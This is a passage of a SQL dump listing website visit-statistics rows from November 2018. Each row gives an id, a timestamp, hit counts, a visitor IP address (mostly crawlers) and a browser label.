,0,'54.36.148.127','other'),(332516,1542275652,1,1,0,0,'54.36.148.90','other'),(332517,1542275659,5,5,0,0,'216.244.66.241','other'),(332518,1542275764,1,1,0,0,'54.36.148.18','other'),(332519,1542275865,1,1,0,0,'54.36.148.16','other'),(332520,1542275963,1,1,0,0,'54.36.148.255','other'),(332521,1542276071,1,1,0,0,'66.249.66.152','chrome'),(332522,1542276257,1,1,0,0,'54.36.148.63','other'),(332523,1542276295,1,1,0,0,'54.36.148.37','other'),(332524,1542276464,1,1,0,0,'66.249.66.157','chrome'),(332526,1542276479,3,3,0,0,'91.124.182.170','firefox'),(332527,1542276519,2,2,0,0,'54.36.148.71','other'),(332528,1542276676,2,2,0,0,'54.165.59.7','other'),(332529,1542276813,1,1,0,0,'54.36.149.90','other'),(332530,1542276820,1,1,0,0,'54.36.148.145','other'),(332531,1542276893,1,1,0,0,'54.36.148.151','other'),(332532,1542276922,3,3,0,0,'141.8.183.23','other'),(332533,1542276926,2,2,0,0,'5.255.253.25','other'),(332534,1542276936,1,1,0,0,'178.154.244.29','other'),(332535,1542276941,1,1,0,0,'54.36.148.12','other'),(332536,1542277087,1,1,0,0,'54.36.149.18','other'),(332537,1542277161,1,1,0,0,'178.154.171.27','other'),(332538,1542277239,1,1,0,0,'95.108.181.57','other'),(332539,1542277242,1,1,0,0,'93.158.166.7','other'),(332540,1542277262,1,1,0,0,'178.154.171.30','other'),(332541,1542277338,2,2,0,0,'141.8.142.162','other'),(332542,1542277339,1,1,0,0,'54.36.148.64','other'),(332543,1542277389,1,1,0,0,'95.108.181.54','other'),(332544,1542277391,1,1,0,0,'5.45.207.8','other'),(332545,1542277486,1,1,0,0,'213.180.203.53','other'),(332546,1542277504,1,1,0,0,'54.36.148.195','other'),(332547,1542277639,1,1,0,0,'54.36.148.89','other'),(332548,1542277659,1,1,0,0,'91.196.178.35','chrome'),(332549,1542277691,1,1,0,0,'54.36.148.109','other'),(332551,1542277702,1,1,0,0,'5.255.253.22','other'),(332552,1542277725,1,1,0,0,'8.29.198.25','other'),(332553,1542277750,1,1,0,0,'87.250.224.99','other'),(332554,1542277788,1,1,0,0,'46.229.168.138','other'),(332555,1542277907,1,1,0,0,'178.154.244.29','other'),(332556,1542277931,1,1,0,0,'54.36.148.179','other'),(332557,1542277994,1,1,0,0,'178.154.171.24','other'),(332558,1542278036,2,2,0,0,'141.8.142.65','other'),(332559,1542278040,1,1,0,0,'54.36.148.57','other'),(332560,1542278054,1,1,0,0,'54.36.149.36','other'),(332561,1542278105,1,1,0,0,'87.250.224.64','other'),(332562,1542278110,1,1,0,0,'54.36.148.121','other'),(332563,1542278223,2,2,0,0,'213.180.203.61','other'),(332564,1542278226,1,1,0,0,'66.249.66.40','chrome'),(332565,1542278241,1,1,0,0,'66.249.66.42','chrome'),(332566,1542278302,2,2,0,0,'5.255.253.16','other'),(332567,1542278303,1,1,0,0,'87.250.224.47','other'),(332568,1542278314,1,1,0,0,'178.154.244.11','other'),(332569,1542278328,2,2,0,0,'95.108.181.83','other'),(332570,1542278329,1,1,0,0,'54.36.148.242','other'),(332571,1542278371,1,1,0,0,'54.36.149.23','other'),(332572,1542278402,1,1,0,0,'141.8.142.38','other'),(332573,1542278452,1,1,0,0,'5.45.207.8','other'),(332574,1542278503,3,3,0,0,'216.244.66.241','other'),(332575,1542278540,1,1,0,0,'54.36.148.154','other'),(332576,1542278587,2,2,0,0,'91.196.178.55','chrome'),(332577,1542278664,1,1,0,0,'54.36.148.251','other'),(332578,1542278670,1,1,0,0,'18.224.8.53','firefox'),(332579,1542278818,1,1,0,0,'54.36.148.174','other'),(332580,1542278826,1,1,0,0,'141.8.183.11','other'),(332581,1542278840,1,1,0,0,'178.154.200.48','other'),(332582,1542278849,2,2,0,0,'213.202.254.136','opera'),(332583,1542278852,1,1,0,0,'87.250.224.107','other'),(332584,1542278865,1,1,0,0,'141.8.142.162','other'),(332585,1542278902,1,1,0,0,'178.154.244.29','other'),(332586,1542278974,2,2,0,0,'141.8.142.144','other'),(332587,1542279033,1,1,0,0,'5.255.253.22','other'),(332588,1542279052,1,1,0,0,'141.8.142.65','other'),(332589,1542279102,1,1,0,0,'54.36.148.187','other'),(332590,1542279132,1,1,0,0,'37.9.113.20','other'),(332591,1542279133,1,1,0,0,'178.154.171.30','other'),(332592,1542279134,1,1,0,0,'54.36.148.199','other'),(332593,1542279204,1,1,0,0,'54.36.149.19','other'),(332594,1542279216,1,1,0,0,'8.29.198.26','other'),(332595,1542279229,1,1,0,0,'54.36.148.112','other'),(332596,1542279239,1,1,0,0,'54.36.148.136','other'),(332597,1542279258,1,1,0,0,'5.255.253.25','other'),(332598,1542279259,1,1,0,0,'213.180.203.53','other'),(332599,1542279269,1,1,0,0,'66.249.66.157','chrome'),(332600,1542279288,1,1,0,0,'66.249.66.44','chrome'),(332601,1542279389,1,1,0,0,'54.36.148.202','other'),(332602,1542279406,1,1,0,0,'5.45.207.8','other'),(332603,1542279428,1,1,0,0,'54.36.149.12','other'),(332604,1542279439,2,2,0,0,'141.8.142.38','other'),(332605,1542279513,1,1,0,0,'54.36.148.240','other'),(332606,1542279542,1,1,0,0,'207.46.13.241','other'),(332607,1542279546,1,1,0,0,'40.77.167.194','other'),(332608,1542279709,1,1,0,0,'54.36.149.7','other'),(332609,1542279710,1,1,0,0,'54.36.149.47','other'),(332610,1542279730,1,1,0,0,'54.36.149.0','other'),(332611,1542279815,1,1,0,0,'213.180.203.61','other'),(332612,1542279817,1,1,0,0,'8.29.198.27','other'),(332613,1542279957,1,1,0,0,'54.36.148.27','other'),(332614,1542279980,2,2,0,0,'40.77.167.198','other'),(332615,1542279989,1,1,0,0,'54.36.149.76','other'),(332616,1542280122,1,1,0,0,'37.9.113.148','other'),(332617,1542280173,1,1,0,0,'54.36.148.255','other'),(332618,1542280219,1,1,0,0,'54.36.148.90','other'),(332619,1542280450,1,1,0,0,'66.249.66.156','chrome'),(332620,1542280557,1,1,0,0,'54.36.148.46','other'),(332621,1542280605,1,1,0,0,'54.36.148.113','other'),(332622,1542280646,1,1,0,0,'54.36.148.191','other'),(332623,1542280727,1,1,0,0,'54.36.148.249','other'),(332624,1542280736,1,1,0,0,'54.36.148.41','other'),(332625,1542280803,1,1,0,0,'207.46.13.169','other'),(332626,1542281237,1,1,0,0,'54.36.149.104','other'),(332627,1542281276,1,1,0,0,'54.36.148.148','other'),(332628,1542281324,3,3,0,0,'216.244.66.241','other'),(332629,1542281522,2,2,0,0,'91.196.178.66','firefox'),(332630,1542281657,1,1,0,0,'54.36.148.223','other'),(332631,1542281678,1,1,0,0,'54.36.149.8','other'),(332632,1542281682,1,1,0,0,'54.36.148.130','other'),(332633,1542281701,1,1,0,0,'54.36.148.217','other'),(332634,1542281760,1,1,0,0,'54.36.149.79','other'),(332635,1542281823,1,1,0,0,'54.36.148.156','other'),(332636,1542282005,1,1,0,0,'54.36.148.41','other'),(332637,1542282016,1,1,0,0,'54.36.149.74','other'),(332638,1542282028,1,1,0,0,'54.36.148.210','other'),(332639,1542282066,1,1,0,0,'54.36.148.164','other'),(332640,1542282075,2,2,0,0,'54.165.59.7','other'),(332641,1542282589,1,1,0,0,'54.36.149.42','other'),(332642,1542282676,1,1,0,0,'54.36.148.117','other'),(332643,1542282990,1,1,0,0,'54.36.149.41','other'),(332644,1542283034,1,1,0,0,'54.36.149.54','other'),(332645,1542283189,1,1,0,0,'13.57.233.99','chrome'),(332646,1542283227,2,2,0,0,'91.196.178.189','chrome'),(332647,1542283243,1,1,0,0,'54.36.149.64','other'),(332648,1542283261,1,1,0,0,'54.36.148.28','other'),(332649,1542283286,1,1,0,0,'54.36.148.122','other'),(332650,1542283345,1,1,0,0,'54.36.148.109','other'),(332651,1542283524,1,1,0,0,'54.36.148.33','other'),(332652,1542283602,2,2,0,0,'216.244.66.241','other'),(332653,1542283656,1,1,0,0,'46.229.168.149','other'),(332654,1542283777,1,1,0,0,'54.36.148.227','other'),(332655,1542283811,1,1,0,0,'54.36.149.14','other'),(332656,1542283925,1,1,0,0,'54.36.149.106','other'),(332657,1542283957,1,1,0,0,'54.36.148.100','other'),(332658,1542283995,1,1,0,0,'54.36.148.92','other'),(332659,1542284071,1,1,0,0,'54.36.149.95','other'),(332660,1542284119,1,1,0,0,'54.36.149.96','other'),(332661,1542284174,1,1,0,0,'178.154.171.24','other'),(332662,1542284188,2,2,0,0,'54.36.148.210','other'),(332663,1542284217,1,1,0,0,'46.164.130.92','firefox'),(332664,1542284218,1,1,0,0,'40.77.167.198','other'),(332665,1542284223,1,1,0,0,'207.46.13.224','other'),(332666,1542284228,1,1,0,0,'40.77.167.209','other'),(332667,1542284319,1,1,0,0,'54.36.149.43','other'),(332668,1542284493,1,1,0,0,'46.229.168.152','other'),(332669,1542284536,1,1,0,0,'54.36.148.64','other'),(332670,1542284755,1,1,0,0,'54.36.148.139','other'),(332671,1542284772,1,1,0,0,'42.236.10.84','chrome'),(332672,1542284775,2,2,0,0,'207.46.13.172','other'),(332674,1542284776,1,1,0,0,'66.249.66.157','chrome'),(332675,1542284777,3,3,0,0,'66.249.66.156','chrome'),(332676,1542285163,1,1,0,0,'54.36.149.9','other'),(332677,1542285200,2,2,0,0,'54.36.149.85','other'),(332678,1542285279,1,1,0,0,'54.36.148.80','other'),(332679,1542285295,1,1,0,0,'54.36.149.48','other'),(332680,1542285394,1,1,0,0,'54.36.148.24','other'),(332681,1542285420,2,2,0,0,'66.249.66.152','chrome'),(332682,1542285534,1,1,0,0,'40.77.167.209','other'),(332683,1542285539,2,2,0,0,'40.77.167.183','other'),(332684,1542285555,1,1,0,0,'54.36.148.76','other'),(332685,1542285615,3,3,0,0,'66.249.66.155','chrome'),(332686,1542285631,2,2,0,0,'66.249.66.154','chrome'),(332687,1542285654,1,1,0,0,'207.46.13.169','other'),(332688,1542285753,1,1,0,0,'54.36.148.119','other'),(332689,1542285833,2,2,0,0,'40.77.167.198','other'),(332690,1542285879,1,1,0,0,'66.249.66.157','chrome'),(332691,1542285965,1,1,0,0,'54.36.149.51','other'),(332692,1542286016,1,1,0,0,'180.163.220.125','chrome'),(332693,1542286020,1,1,0,0,'180.163.220.97','chrome'),(332694,1542286100,1,1,0,0,'180.163.220.101','chrome'),(332695,1542286103,1,1,0,0,'180.163.220.99','chrome'),(332696,1542286107,1,1,0,0,'54.36.149.84','other'),(332697,1542286117,1,1,0,0,'54.36.149.103','other'),(332698,1542286135,1,1,0,0,'207.46.13.224','other'),(332699,1542286265,1,1,0,0,'54.36.148.101','other'),(332700,1542286281,5,5,0,0,'216.244.66.241','other'),(332701,1542286764,1,1,0,0,'54.36.148.210','other'),(332702,1542286852,2,2,0,0,'40.77.167.198','other'),(332703,1542286856,2,2,0,0,'40.77.167.183','other'),(332704,1542287023,2,2,0,0,'109.251.94.24','chrome'),(332705,1542287059,1,1,0,0,'66.249.66.61','chrome'),(332706,1542287061,1,1,0,0,'66.249.66.44','chrome'),(332707,1542287161,1,1,0,0,'46.229.168.145','other'),(332708,1542287536,1,1,0,0,'54.36.148.88','other'),(332709,1542287648,1,1,0,0,'46.229.168.153','other'),(332710,1542287650,1,1,0,0,'46.229.168.130','other'),(332711,1542287714,1,1,0,0,'54.36.149.59','other'),(332712,1542288167,1,1,0,0,'207.46.13.169','other'),(332713,1542288173,2,2,0,0,'157.55.39.212','other'),(332714,1542288289,1,1,0,0,'54.36.149.63','other'),(332715,1542288324,3,3,0,0,'216.244.66.241','other'),(332716,1542288395,1,1,0,0,'54.36.148.254','other'),(332717,1542288435,2,2,0,0,'91.196.178.93','chrome'),(332718,1542288568,1,1,0,0,'8.29.198.25','other'),(332719,1542288721,1,1,0,0,'54.36.148.124','other'),(332720,1542288759,1,1,0,0,'54.36.148.199','other'),(332721,1542288787,1,1,0,0,'207.46.13.172','other'),(332722,1542288798,2,2,0,0,'91.196.178.83','chrome'),(332723,1542289182,1,1,0,0,'54.36.148.157','other'),(332724,1542289197,1,1,0,0,'54.36.148.232','other'),(332725,1542289335,1,1,0,0,'54.36.148.214','other'),(332726,1542289448,1,1,0,0,'157.55.39.212','other'),(332727,1542289471,1,1,0,0,'54.36.148.22','other'),(332728,1542289553,1,1,0,0,'54.36.148.27','other'),(332729,1542289573,1,1,0,0,'54.36.148.152','other'),(332730,1542289588,1,1,0,0,'94.179.168.227','chrome'),(332731,1542289596,1,1,0,0,'54.36.149.59','other'),(332732,1542289604,1,1,0,0,'54.36.148.69','other'),(332733,1542289631,1,1,0,0,'54.36.148.33','other'),(332734,1542289794,1,1,0,0,'54.36.149.80','other'),(332735,1542289806,3,3,0,0,'46.30.166.126','chrome'),(332736,1542289807,1,1,0,0,'207.46.13.169','other'),(332737,1542289817,1,1,0,0,'37.53.228.75','chrome'),(332738,1542289845,1,1,0,0,'54.36.149.21','other'),(332739,1542289870,2,2,0,0,'91.196.178.129','firefox'),(332740,1542289929,1,1,0,0,'54.36.148.184','other'),(332741,1542290001,1,1,0,0,'40.77.167.198','other'),(332742,1542290062,1,1,0,0,'8.29.198.26','other'),(332743,1542290089,1,1,0,0,'207.46.13.172','other'),(332744,1542290143,1,1,0,0,'54.36.149.82','other'),(332745,1542290202,1,1,0,0,'54.36.148.30','other'),(332746,1542290207,1,1,0,0,'54.36.149.35','other'),(332747,1542290232,1,1,0,0,'54.36.148.81','other'),(332748,1542290243,1,1,0,0,'54.36.148.234','other'),(332749,1542290330,1,1,0,0,'54.36.148.101','other'),(332750,1542290448,1,1,0,0,'46.229.168.150','other'),(332751,1542290451,1,1,0,0,'46.229.168.135','other'),(332752,1542290480,1,1,0,0,'54.36.148.13','other'),(332753,1542290500,1,1,0,0,'54.36.149.59','other'),(332754,1542290547,1,1,0,0,'54.36.148.129','other'),(332755,1542290549,1,1,0,0,'54.36.148.110','other'),(332756,1542290660,1,1,0,0,'54.36.148.219','other'),(332757,1542290666,1,1,0,0,'8.29.198.27','other'),(332758,1542290754,1,1,0,0,'207.46.13.224','other'),(332759,1542290854,1,1,0,0,'54.36.148.195','other'),(332760,1542290953,4,4,0,0,'216.244.66.241','other'),(332761,1542290973,1,1,0,0,'54.36.148.56','other'),(332762,1542291055,2,2,0,0,'40.77.167.198','other'),(332763,1542291057,1,1,0,0,'54.36.149.36','other'),(332764,1542291159,1,1,0,0,'46.229.168.139','other'),(332765,1542291163,1,1,0,0,'46.229.168.143','other'),(332766,1542291294,1,1,0,0,'54.36.148.105','other'),(332767,1542291636,1,1,0,0,'54.36.149.24','other'),(332768,1542291756,1,1,0,0,'46.229.168.135','other'),(332769,1542291783,1,1,0,0,'54.36.148.78','other'),(332770,1542291822,1,1,0,0,'40.77.167.209','other'),(332771,1542291839,1,1,0,0,'46.229.168.142','other'),(332772,1542291843,1,1,0,0,'46.229.168.141','other'),(332773,1542292038,2,2,0,0,'54.36.149.101','other'),(332774,1542292091,2,2,0,0,'37.55.193.59','chrome'),(332775,1542292125,2,2,0,0,'216.244.66.241','other'),(332776,1542292204,1,1,0,0,'54.36.148.146','other'),(332777,1542292212,1,1,0,0,'54.36.148.236','other'),(332778,1542292288,1,1,0,0,'54.36.148.14','other'),(332779,1542292395,2,2,0,0,'91.196.178.93','chrome'),(332780,1542292454,1,1,0,0,'54.36.149.3','other'),(332781,1542292481,1,1,0,0,'54.36.148.254','other'),(332782,1542292706,1,1,0,0,'207.46.13.207','other'),(332783,1542292955,1,1,0,0,'54.36.148.42','other'),(332784,1542292979,1,1,0,0,'54.36.149.56','other'),(332785,1542293056,1,1,0,0,'54.36.148.41','other'),(332786,1542293059,1,1,0,0,'54.36.148.170','other'),(332787,1542293181,1,1,0,0,'54.36.148.16','other'),(332788,1542293254,2,2,0,0,'188.191.103.32','chrome'),(332789,1542293265,1,1,0,0,'54.36.148.230','other'),(332790,1542293322,1,1,0,0,'54.36.148.197','other'),(332791,1542293435,1,1,0,0,'54.36.149.64','other'),(332792,1542293453,1,1,0,0,'54.36.149.32','other'),(332793,1542293481,2,2,0,0,'40.77.167.183','other'),(332794,1542293553,1,1,0,0,'54.36.148.182','other'),(332795,1542293563,2,2,0,0,'91.196.178.135','firefox'),(332796,1542293582,1,1,0,0,'54.36.149.90','other'),(332797,1542293685,1,1,0,0,'54.36.148.129','other'),(332798,1542293705,1,1,0,0,'54.36.148.70','other'),(332799,1542293768,2,2,0,0,'216.244.66.241','other'),(332800,1542293781,1,1,0,0,'40.77.167.198','other'),(332801,1542293847,1,1,0,0,'54.36.148.49','other'),(332802,1542293896,1,1,0,0,'54.36.149.84','other'),(332803,1542293920,1,1,0,0,'46.229.168.152','other'),(332804,1542293977,1,1,0,0,'54.36.148.43','other'),(332805,1542294026,1,1,0,0,'54.36.149.77','other'),(332806,1542294237,1,1,0,0,'54.165.59.7','other'),(332807,1542294242,1,1,0,0,'54.36.148.135','other'),(332808,1542294317,1,1,0,0,'54.36.148.180','other'),(332809,1542294361,1,1,0,0,'54.36.148.154','other'),(332810,1542294519,2,2,0,0,'91.124.182.170','firefox'),(332811,1542294553,1,1,0,0,'54.36.149.9','other'),(332812,1542294647,1,1,0,0,'54.36.149.98','other'),(332813,1542294688,1,1,0,0,'54.36.148.162','other'),(332814,1542294735,2,2,0,0,'46.229.168.135','other'),(332815,1542294780,1,1,0,0,'157.55.39.212','other'),(332816,1542294859,1,1,0,0,'54.36.148.29','other'),(332817,1542295016,1,1,0,0,'54.36.148.243','other'),(332818,1542295066,1,1,0,0,'54.36.148.213','other'),(332819,1542295076,1,1,0,0,'54.36.148.63','other'),(332820,1542295108,1,1,0,0,'54.36.149.102','other'),(332821,1542295146,1,1,0,0,'91.196.178.135','chrome'),(332822,1542295204,1,1,0,0,'54.36.148.206','other'),(332823,1542295356,1,1,0,0,'54.36.148.62','other'),(332824,1542295383,1,1,0,0,'54.36.148.233','other'),(332825,1542295399,1,1,0,0,'54.36.148.207','other'),(332826,1542295424,1,1,0,0,'54.36.148.173','other'),(332827,1542295429,1,1,0,0,'54.36.148.177','other'),(332828,1542295528,1,1,0,0,'54.36.148.60','other'),(332829,1542295560,1,1,0,0,'46.229.168.142','other'),(332830,1542295562,1,1,0,0,'46.229.168.134','other'),(332831,1542295582,1,1,0,0,'178.154.244.11','other'),(332832,1542295587,1,1,0,0,'54.36.148.95','other'),(332833,1542295692,1,1,0,0,'54.36.148.220','other'),(332834,1542295707,2,2,0,0,'5.255.253.25','other'),(332835,1542295711,1,1,0,0,'95.108.181.94','other'),(332836,1542295719,1,1,0,0,'178.154.244.29','other'),(332837,1542295730,1,1,0,0,'46.229.168.138','other'),(332838,1542295734,1,1,0,0,'46.229.168.145','other'),(332839,1542295739,1,1,0,0,'178.154.171.30','other'),(332840,1542295778,1,1,0,0,'54.36.149.35','other'),(332841,1542295804,2,2,0,0,'141.8.183.11','other'),(332842,1542295836,1,1,0,0,'54.36.148.120','other'),(332843,1542295865,1,1,0,0,'54.36.148.218','other'),(332844,1542295867,1,1,0,0,'178.154.171.27','other'),(332845,1542295889,1,1,0,0,'95.108.181.54','other'),(332846,1542295906,1,1,0,0,'54.36.148.105','other'),(332847,1542295968,1,1,0,0,'54.36.149.94','other'),(332848,1542296059,1,1,0,0,'40.77.167.183','other'),(332849,1542296120,1,1,0,0,'54.36.148.83','other'),(332850,1542296219,1,1,0,0,'178.154.171.24','other'),(332851,1542296238,1,1,0,0,'54.36.148.253','other'),(332852,1542296291,1,1,0,0,'54.36.148.233','other'),(332853,1542296442,1,1,0,0,'54.36.148.21','other'),(332854,1542296459,1,1,0,0,'54.36.148.241','other'),(332855,1542296505,1,1,0,0,'54.36.148.224','other'),(332856,1542296572,1,1,0,0,'54.36.149.7','other'),(332857,1542296607,1,1,0,0,'54.36.148.108','other'),(332858,1542296677,1,1,0,0,'54.36.148.208','other'),(332859,1542296683,1,1,0,0,'54.36.148.117','other'),(332860,1542296746,3,3,0,0,'216.244.66.241','other'),(332861,1542296874,2,2,0,0,'54.36.148.54','other'),(332862,1542296910,1,1,0,0,'54.36.148.91','other'),(332863,1542296915,1,1,0,0,'54.36.148.168','other'),(332864,1542296975,2,2,0,0,'176.193.121.212','firefox'),(332865,1542297000,1,1,0,0,'54.36.148.110','other'),(332866,1542297004,1,1,0,0,'54.36.148.162','other'),(332867,1542297145,1,1,0,0,'66.249.75.17','chrome'),(332868,1542297146,1,1,0,0,'66.249.75.22','chrome'),(332869,1542297502,1,1,0,0,'66.249.69.202','chrome'),(332870,1542297537,1,1,0,0,'54.36.149.84','other'),(332871,1542297654,1,1,0,0,'54.36.148.23','other'),(332872,1542297745,1,1,0,0,'54.36.148.145','other'),(332873,1542297748,1,1,0,0,'54.36.148.100','other'),(332874,1542297803,1,1,0,0,'54.36.148.65','other'),(332875,1542298061,2,2,0,0,'66.249.69.204','chrome'),(332876,1542298199,1,1,0,0,'54.36.149.48','other'),(332877,1542298351,1,1,0,0,'54.36.148.180','other'),(332878,1542298545,1,1,0,0,'66.249.75.16','chrome'),(332879,1542298546,1,1,0,0,'66.249.75.21','chrome'),(332880,1542298661,1,1,0,0,'54.36.148.224','other'),(332881,1542298735,1,1,0,0,'54.36.148.28','other'),(332882,1542298776,1,1,0,0,'216.244.66.241','other'),(332883,1542298820,2,2,0,0,'91.196.178.186','chrome'),(332884,1542298835,1,1,0,0,'54.36.148.229','other'),(332885,1542298926,1,1,0,0,'207.46.13.169','other'),(332886,1542298975,1,1,0,0,'54.36.148.59','other'),(332887,1542299093,1,1,0,0,'66.249.69.202','chrome'),(332888,1542299125,1,1,0,0,'54.36.148.46','other'),(332889,1542299361,1,1,0,0,'54.36.148.203','other'),(332890,1542299399,1,1,0,0,'66.249.69.200','chrome'),(332891,1542299418,1,1,0,0,'54.36.148.36','other'),(332892,1542299425,1,1,0,0,'8.29.198.27','other'),(332893,1542299559,1,1,0,0,'54.36.148.183','other'),(332894,1542299662,1,1,0,0,'54.36.149.22','other'),(332895,1542299770,3,3,0,0,'216.244.66.241','other'),(332896,1542299875,1,1,0,0,'54.36.148.62','other'),(332897,1542299899,1,1,0,0,'54.36.149.98','other'),(332898,1542299922,1,1,0,0,'103.253.25.181','firefox'),(332899,1542299989,1,1,0,0,'54.36.148.22','other'),(332900,1542299998,1,1,0,0,'54.36.148.217','other'),(332901,1542300058,1,1,0,0,'66.249.69.150','chrome'),(332902,1542300112,1,1,0,0,'54.36.148.211','other'),(332903,1542300132,1,1,0,0,'54.36.149.73','other'),(332904,1542300182,1,1,0,0,'54.36.149.89','other'),(332905,1542300278,1,1,0,0,'54.36.148.220','other'),(332906,1542300334,1,1,0,0,'54.36.148.175','other'),(332907,1542300431,1,1,0,0,'54.36.148.199','other'),(332908,1542300470,1,1,0,0,'54.36.148.23','other'),(332909,1542300651,1,1,0,0,'54.36.148.161','other'),(332910,1542300720,1,1,0,0,'54.36.148.49','other'),(332911,1542300781,1,1,0,0,'54.36.148.254','other'),(332912,1542300842,1,1,0,0,'54.36.148.13','other'),(332913,1542300899,2,2,0,0,'8.29.198.27','other'),(332914,1542300981,1,1,0,0,'54.36.148.180','other'),(332915,1542301001,1,1,0,0,'54.36.148.241','other'),(332916,1542301339,1,1,0,0,'54.36.149.53','other'),(332917,1542301419,4,4,0,0,'216.244.66.241','other'),(332918,1542301778,1,1,0,0,'54.36.148.98','other'),(332919,1542301861,2,2,0,0,'46.229.168.149','other'),(332920,1542301863,1,1,0,0,'46.229.168.129','other'),(332921,1542301995,1,1,0,0,'54.36.148.49','other'),(332922,1542302039,1,1,0,0,'54.36.148.55','other'),(332923,1542302056,1,1,0,0,'54.36.148.18','other'),(332924,1542302150,1,1,0,0,'54.36.148.211','other'),(332925,1542302175,1,1,0,0,'54.36.148.106','other'),(332926,1542302191,1,1,0,0,'66.249.69.204','chrome'),(332927,1542302198,2,2,0,0,'66.249.75.20','chrome'),(332928,1542302334,1,1,0,0,'54.36.149.89','other'),(332929,1542302344,3,3,0,0,'216.244.66.241','other'),(332930,1542302362,1,1,0,0,'46.229.168.133','other'),(332931,1542302377,1,1,0,0,'54.36.148.252','other'),(332932,1542302413,1,1,0,0,'54.36.148.132','other'),(332933,1542302422,1,1,0,0,'54.36.148.199','other'),(332934,1542302547,1,1,0,0,'54.36.148.82','other'),(332935,1542302659,1,1,0,0,'54.36.148.23','other'),(332936,1542302693,1,1,0,0,'54.36.148.245','other'),(332937,1542302768,1,1,0,0,'54.36.148.237','other'),(332938,1542302798,1,1,0,0,'54.36.148.151','other'),(332939,1542302804,1,1,0,0,'54.36.149.17','other'),(332940,1542302827,1,1,0,0,'46.229.168.150','other'),(332941,1542302913,1,1,0,0,'54.36.148.152','other'),(332942,1542303084,1,1,0,0,'54.36.148.214','other'),(332943,1542303109,1,1,0,0,'54.36.148.177','other'),(332944,1542303282,1,1,0,0,'54.36.148.36','other'),(332945,1542303505,1,1,0,0,'54.36.148.24','other'),(332946,1542303614,1,1,0,0,'54.36.148.98','other'),(332947,1542303687,1,1,0,0,'54.36.148.167','other'),(332948,1542303696,4,4,0,0,'216.244.66.241','other'),(332949,1542303723,1,1,0,0,'54.36.148.131','other'),(332950,1542303730,1,1,0,0,'54.36.148.47','other'),(332951,1542303817,1,1,0,0,'157.55.39.212','other'),(332952,1542304259,1,1,0,0,'54.36.148.249','other'),(332953,1542304296,1,0,1,0,'66.249.69.204',''),(332954,1542304317,1,1,0,0,'54.36.148.132','other'),(332955,1542304329,1,1,0,0,'54.36.148.58','other'),(332956,1542304407,2,2,0,0,'46.211.26.95','chrome'),(332957,1542304431,1,1,0,0,'54.36.148.82','other'),(332958,1542304436,1,1,0,0,'54.36.148.253','other'),(332959,1542304621,1,1,0,0,'216.244.66.241','other'),(332960,1542304722,2,2,0,0,'54.36.148.47','other'),(332961,1542304844,1,1,0,0,'54.36.149.73','other'),(332962,1542304851,1,1,0,0,'66.249.69.204','chrome'),(332963,1542304921,1,1,0,0,'207.46.13.169','other'),(332964,1542304979,1,1,0,0,'54.36.148.66','other'),(332965,1542305061,1,1,0,0,'54.36.148.147','other'),(332966,1542305298,1,1,0,0,'54.36.148.142','other'),(332967,1542305359,1,1,0,0,'54.36.149.38','other'),(332968,1542305392,1,1,0,0,'54.36.148.49','other'),(332969,1542305718,1,1,0,0,'54.36.148.172','other'),(332970,1542305785,1,1,0,0,'95.163.255.116','other'),(332971,1542305790,1,1,0,0,'95.163.255.109','other'),(332972,1542305796,1,1,0,0,'95.163.255.104','other'),(332973,1542305801,1,1,0,0,'95.163.255.115','other'),(332974,1542306065,2,2,0,0,'54.36.148.58','other'),(332975,1542306082,1,1,0,0,'54.36.148.170','other'),(332976,1542306104,1,1,0,0,'54.36.149.83','other'),(332977,1542306124,1,1,0,0,'141.8.183.23','other'),(332978,1542306172,1,1,0,0,'40.77.167.198','other'),(332979,1542306185,2,2,0,0,'46.211.26.95','chrome'),(332980,1542306208,1,1,0,0,'54.36.149.41','other'),(332981,1542306274,1,1,0,0,'54.36.148.115','other'),(332982,1542306356,1,1,0,0,'54.36.148.55','other'),(332983,1542306384,1,1,0,0,'54.36.149.28','other'),(332984,1542306430,1,1,0,0,'54.36.148.65','other'),(332985,1542306481,1,1,0,0,'54.36.148.163','other'),(332986,1542306488,1,1,0,0,'54.36.148.23','other'),(332987,1542306502,1,1,0,0,'54.36.148.29','other'),(332988,1542306548,3,3,0,0,'216.244.66.241','other'),(332989,1542306782,1,1,0,0,'54.36.148.67','other'),(332990,1542306824,1,1,0,0,'54.36.149.29','other'),(332991,1542307016,1,1,0,0,'54.36.148.195','other'),(332992,1542307113,1,1,0,0,'54.36.149.65','other'),(332993,1542307207,16,16,0,0,'69.197.177.50','other'),(332994,1542307279,1,1,0,0,'54.36.148.223','other'),(332995,1542307289,1,0,1,0,'66.249.75.20',''),(332996,1542307358,2,2,0,0,'207.46.13.172','other'),(332997,1542307455,1,1,0,0,'216.244.66.241','other'),(332998,1542307472,1,1,0,0,'54.36.148.87','other'),(332999,1542307540,1,1,0,0,'54.36.149.18','other'),(333000,1542307572,1,1,0,0,'54.36.148.31','other'),(333001,1542307615,1,1,0,0,'54.36.148.228','other'),(333002,1542307726,1,1,0,0,'91.196.178.183','chrome'),(333003,1542307950,1,1,0,0,'54.36.149.89','other'),(333004,1542308021,2,2,0,0,'66.249.75.22','chrome'),(333005,1542308262,1,1,0,0,'54.36.148.184','other'),(333006,1542308295,1,1,0,0,'46.229.168.129','other'),(333007,1542308329,1,1,0,0,'54.36.149.67','other'),(333008,1542308352,2,2,0,0,'194.44.7.162','firefox'),(333009,1542308467,1,1,0,0,'54.36.148.45','other'),(333010,1542308581,3,3,0,0,'66.249.75.20','chrome'),(333011,1542308595,1,1,0,0,'54.36.148.247','other'),(333012,1542308658,1,1,0,0,'54.36.148.22','other'),(333013,1542308892,1,1,0,0,'54.36.148.242','other'),(333014,1542308896,1,1,0,0,'54.36.148.140','other'),(333015,1542309034,1,1,0,0,'66.249.69.217','chrome'),(333016,1542309035,2,2,0,0,'66.249.69.202','chrome'),(333017,1542309036,1,1,0,0,'54.36.148.149','other'),(333018,1542309072,3,3,0,0,'66.249.75.21','chrome'),(333019,1542309094,1,1,0,0,'54.36.148.178','other'),(333020,1542309101,5,5,0,0,'216.244.66.241','other'),(333021,1542309169,1,1,0,0,'176.193.98.113','msie'),(333022,1542309208,1,1,0,0,'66.249.75.22','chrome'),(333023,1542309256,1,1,0,0,'54.36.149.19','other'),(333024,1542309306,2,2,0,0,'66.249.69.200','chrome'),(333025,1542309365,1,1,0,0,'54.36.148.127','other'),(333026,1542309412,1,1,0,0,'66.249.69.221','chrome'),(333027,1542309624,1,1,0,0,'54.36.149.69','other'),(333028,1542309654,1,1,0,0,'54.36.149.62','other'),(333029,1542309780,1,1,0,0,'54.36.148.250','other'),(333030,1542309819,1,1,0,0,'54.36.149.107','other'),(